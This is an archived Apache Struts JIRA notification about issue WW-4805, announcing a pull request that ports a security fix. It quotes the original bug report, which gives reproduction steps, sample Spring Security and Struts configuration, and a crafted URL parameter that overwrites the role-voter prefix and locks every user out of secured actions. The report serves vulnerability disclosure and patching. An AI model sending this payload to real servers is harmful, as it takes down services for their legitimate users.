You are viewing a plain text version of this content. The canonical link for it is here.
Posted to issues@struts.apache.org by "ASF GitHub Bot (JIRA)" <ji...@apache.org> on 2017/07/07 09:12:00 UTC
[jira] [Commented] (WW-4805) At least a DoS attack is available for
Spring secured actions
[ https://issues.apache.org/jira/browse/WW-4805?page=com.atlassian.jira.plugin.system.issuetabpanels:comment-tabpanel&focusedCommentId=16077846#comment-16077846 ]
ASF GitHub Bot commented on WW-4805:
------------------------------------
GitHub user yasserzamani opened a pull request:
https://github.com/apache/struts/pull/147
WW-4805: Adds constant to control proxy member access (support-2-3)
Ports #146 to branch support-2-3.
You can merge this pull request into a Git repository by running:
$ git pull https://github.com/yasserzamani/struts support-2-3_WW-4805_2
Alternatively you can review and apply these changes as the patch at:
https://github.com/apache/struts/pull/147.patch
To close this pull request, make a commit to your master/trunk branch
with (at least) the following in the commit message:
This closes #147
----
commit 086b63735527d4bb0c1dd0d86a7c0374b825ff24
Author: Yasser Zamani <ya...@live.com>
Date: 2017-07-07T09:05:10Z
Adds constant to control proxy member access
----
> At least a DoS attack is available for Spring secured actions
> -------------------------------------------------------------
>
> Key: WW-4805
> URL: https://issues.apache.org/jira/browse/WW-4805
> Project: Struts 2
> Issue Type: Improvement
> Components: Core, Plugin - Spring
> Affects Versions: 2.3.32, 2.5.10
> Reporter: Yasser Zamani
> Labels: github-import, patch, security
> Fix For: 2.3.33, 2.5.12
>
>
> This is a DoS attack example when Struts2 user uses Spring to secure his actions, like mentioned at section `Initializing Actions from Spring` of [spring-plugin|https://struts.apache.org/docs/spring-plugin.html]
> Attack Steps:
> # An anonymous user logins as an authenticated user.
> # Then tries
> {noformat}
> http://{ip}:{port}/{action0-actionN}?advisors[{0-n}].advice.accessDecisionManager.decisionVoters[{0-n}].rolePrefix=breakit
> {noformat}
> where {action0-actionN} are actions available for users
> Attack Impacts:
> By replacing `rolePrefix`, attacker blocks access to secured actions for all defined roles even if they authenticate via login! so services are down and webapp restart is required to back to normal!!!
> Configuration Example:
> * spring-security.xml
> {code:xml}
> <global-method-security secured-annotations="enabled" proxy-target-class = "true" />
> <http auto-config="true" use-expressions="false">
> <intercept-url pattern="/**" access="IS_AUTHENTICATED_ANONYMOUSLY" />
> </http>
> <authentication-manager erase-credentials="false">
> <authentication-provider>
> <user-service>
> <user name="admin" password="admin" authorities="ROLE_ADMIN" />
> <user name="user" password="user" authorities="ROLE_USER" />
> </user-service>
> </authentication-provider>
> </authentication-manager>
> {code}
> * applicationContext.xml
> {code:xml}
> <bean id="secureAction" class="me.zamani.yasser.ww_convention.actions.SecureAction"/>
> {code}
> * struts.xml
> {code:xml}
> <action name="admin" class="secureAction" method="admin">
> <result name="success" type="json" />
> </action>
> <action name="user" class="secureAction" method="user">
> <result name="success" type="json" />
> </action>
> {code}
> * SecureAction.java
> {code:java}
> package me.zamani.yasser.ww_convention.actions;
> import org.springframework.security.access.annotation.Secured;
> public class SecureAction {
> @Secured({"ROLE_ADMIN"})
> public String admin() {
> return "success";
> }
> @Secured({"ROLE_USER"})
> public String user() {
> return "success";
> }
> }
> {code}
> * login via
> {noformat}
> http://{ip}:{port}/login
> {noformat}
> as user.
> * open
> {noformat}
> http://{ip}:{port}/user?advisors[0].advice.accessDecisionManager.decisionVoters[0].rolePrefix=breakit
> {noformat}
> * in another browser, login via
> {noformat}
> http://{ip}:{port}/login
> {noformat}
> as admin.
> * try to access
> {noformat}
> http://{ip}:{port}/admin
> {noformat}
> which fails!
> * also repeat 5 and try open
> {noformat}
> http://{ip}:{port}/user
> {noformat}
> which also fails!
> * Services are down and webapp restart is required to back to normal.
--
This message was sent by Atlassian JIRA
(v6.4.14#64029)